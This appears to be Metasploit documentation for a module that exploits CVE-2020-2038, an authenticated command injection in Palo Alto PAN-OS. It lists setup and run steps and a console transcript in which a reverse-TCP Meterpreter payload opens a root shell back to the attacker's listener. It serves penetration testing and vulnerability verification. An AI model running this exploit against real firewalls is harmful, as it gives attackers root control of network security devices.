## Vulnerable Application

This module exploits CVE-2020-2038, an authenticated OS Command Injection vulnerability in PAN-OS versions < 10.0.1,
< 9.1.4 and <9.0.10 that allows authenticated administrators to execute arbitrary OS commands with root privileges. The
Rest API allows authenticated users to send operational mode commands via the "op" request. Insufficient filtering of
user inputs in the "op" request allows an attacker to inject commands.

A Palo Alto Firewall demo VM can be requested at the following
[link](https://www.paloaltonetworks.com/company/request-demo). PAN‑OS is the software that runs all Palo Alto Networks
next-generation firewalls. PAN-OS will be running on the VM by default. The only setup necessary should be setting the
administrator password.

## Verification Steps

1. Start msfconsole
1. Do: `use exploit/linux/http/panos_auth_rce`
1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
1. Run the module
1. Receive a Meterpreter session as the `root` user.

## Scenarios
### PAN-OS 10.0.0
```
msf6 > use linux/http/panos_auth_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/panos_auth_rce) > set rhosts 192.168.2.196
rhosts => 192.168.2.196
msf6 exploit(linux/http/panos_auth_rce) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/panos_auth_rce) > set PASSWORD N0tpassword!
PASSWORD => N0tpassword!
msf6 exploit(linux/http/panos_auth_rce) > run

[*] Started reverse TCP handler on 192.168.2.114:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Authenticating...
[+] Successfully obtained api key
[+] The target is vulnerable.
[*] Exploiting...
[*] Sending stage (989032 bytes) to 192.168.2.196
[*] Meterpreter session 1 opened (192.168.2.114:4444 -> 192.168.2.196:52592) at 2022-08-17 16:13:19 -0400
[*] Command Stager progress - 100.00% done (1111/1111 bytes)

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : PA-VM-10-0-0.home
OS           : Red Hat  (Linux 3.10.0-957.21.3.10.pan.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```
